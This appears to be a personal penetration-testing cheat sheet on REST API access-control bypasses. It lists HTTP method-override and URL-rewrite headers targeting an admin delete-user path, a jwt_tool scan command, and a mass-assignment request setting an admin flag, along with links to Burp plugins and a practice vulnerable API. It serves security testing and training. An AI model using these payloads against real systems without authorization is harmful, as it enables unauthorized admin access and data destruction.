REST API - Bypasses and Privilege Escalations

REST API security testing

Methodology

API testing | Web Security AcademyWebSecAcademy

PortSwigger-Academy-CheatSheets/API Testing at master · ChrisM-X/PortSwigger-Academy-CheatSheetsGitHub

Bypassing API filter and ACL by rewriting HTTP methods an URLs

X-HTTP-Method: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method-Override: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method: PATCH
X-HTTP-Method: PATCH
X-Method-Override: PATCH
X-Original-Method: PATCH
X-Original-URL: /admin/deleteUser
X-Rewrite-URL: /admin/deleteUser

Access Admin Interface

using HTTP headers rewriting trusted client's IP address or Hosts.

JWT Access Token Tampering

JWT Editor : Burp plugin

Available in BApp store, explore also advanced JWT header attacks https://portswigger.net/web-security/jwt#jwt-header-parameter-injections

GitHub - PortSwigger/jwt-editor: A Burp Suite extension for creating and editing JSON Web Tokens. This tool supports signing and verification of JWS, encryption and decryption of JWE and automation of several well-known attacks against applications that consume JWT.GitHub

JWT Tool

https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology

python3 ./jwt_tool.py -M pb -t http:/URL:5001/api/method  -pd "{\"propertyId\": 29}" -rh "Authorization: Bearer <TOKEN>" -rh "Content-Type: text/json"

Mass Assignment

Observer object properties and try to set them (search for hidden parameters PARAMMINER)

POST /api/user/create
Host: server
Content-Type: application/json

{ "admin": true}

API Tester

GitHub - OWASP/OFFAT at mainGitHub

Vulnerable API Project to practice with

GitHub - theowni/Damn-Vulnerable-RESTaurant-API-Game: Damn Vulnerable Restaurant is an intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.GitHub